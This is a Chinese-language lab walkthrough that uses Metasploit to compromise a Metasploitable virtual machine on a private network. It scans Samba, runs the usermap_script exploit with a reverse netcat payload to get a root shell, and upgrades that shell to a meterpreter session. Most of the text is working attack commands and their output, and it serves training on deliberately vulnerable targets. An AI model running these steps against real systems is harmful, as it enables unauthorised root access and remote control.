链接:https://pan.baidu.com/s/172oPtDMQPVFfrfiCasPPJQ
提取码:anm4
解压文件后用VMware扫描即可
- 攻击方:Kali Linux
IP地址为:192.168.118.1
- 靶机IP地址:192.168.118.2
- 锁定目标
msf6 > db_nmap -sV -A 192.168.118.2
[*] Nmap: Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-27 10:27 CST
msf6 > services
Services
========
host port proto name state info
192.168.118.2 139 tcp netbios-ssn open Samba smbd 3.X - 4.X workgroup: WORKGROUP
192.168.118.2 445 tcp netbios-ssn open Samba smbd 3.0.20-Debian workgroup: WORKGROUP
- 选择攻击模块
msf6 > use exploit/multi/samba/usermap_script
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(multi/samba/usermap_script) > info
- 配置参数
通过 show missing 命令,可以查看必须要配置的参数。并设置主机
msf6 exploit(multi/samba/usermap_script) > show missing
Module options (exploit/multi/samba/usermap_script):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
Payload options (cmd/unix/reverse_netcat):
Name Current Setting Required Description
---- --------------- -------- -----------
msf6 exploit(multi/samba/usermap_script) > set rhosts 192.168.118.2
rhosts => 192.168.118.2
开始
msf6 exploit(multi/samba/usermap_script) > run
[*] Started reverse TCP handler on 192.168.118.1:4444
[*] Command shell session 2 opened (192.168.118.1:4444 -> 192.168.118.2:53121) at 2021-02-27 11:01:51 +0800
hostname
metasploitable
id
uid=0(root) gid=0(root)
攻击成功后,我们将获得与目标机器的连接会话。
我们可用执行一些命令,来验证是否获得了目标机器的权限。
- 按 Ctrl+Z可将会话转到后台。
^Z
Background session 2? [y/N] y
msf6 exploit(multi/samba/usermap_script) >
- 使用 sessions命令,重新调出会话。
msf6 exploit(multi/samba/usermap_script) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
2 shell cmd/unix 192.168.118.1:4444 -> 192.168.118.2:53121 (192.168.118.2)
msf6 exploit(multi/samba/usermap_script) > sessions -i 2
[*] Starting interaction with 2...
id
uid=0(root) gid=0(root)
- MSF 默认指定了 payload。
- show payloas 列出当前所有可用的攻击载荷
- 将shell会话升级成meterpreter会话,从而使用更高级的功能
msf6 exploit(multi/samba/usermap_script) > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
3 shell cmd/unix 192.168.118.1:4444 -> 192.168.118.2:38867 (192.168.118.2)
msf6 exploit(multi/samba/usermap_script) > sessions -u 3
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [3]
[*] Upgrading session ID: 3
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.118.1:4433
[*] Sending stage (976712 bytes) to 192.168.118.2
[*] Meterpreter session 4 opened (192.168.118.1:4433 -> 192.168.118.2:59915) at 2021-02-27 11:26:09 +0800
[*] Command stager progress: 100.00% (773/773 bytes)
msf6 exploit(multi/samba/usermap_script) > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
3 shell cmd/unix 192.168.118.1:4444 -> 192.168.118.2:38867 (192.168.118.2)
4 meterpreter x86/linux root @ metasploitable (uid=0, gid=0, euid=0, egid=0) @ metasploitable.localdo... 192.168.118.1:4433 -> 192.168.118.2:59915 (192.168.118.2)
msf6 exploit(multi/samba/usermap_script) > sessions -i 4
[*] Starting interaction with 4...
meterpreter >
meterpreter > ipconfig
Interface 2
============
Name : eth0
Hardware MAC : 00:0c:29:be:8d:c1
MTU : 1500
Flags : UP,BROADCAST,MULTICAST
IPv4 Address : 192.168.118.2
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::20c:29ff:febe:8dc1
IPv6 Netmask : ffff:ffff:ffff:ffff::
meterpreter > guid
[+] Session GUID: b7435625-211f-4000-b516-0a22e35d8b4b
meterpreter > getuid
Server username: root @ metasploitable (uid=0, gid=0, euid=0, egid=0)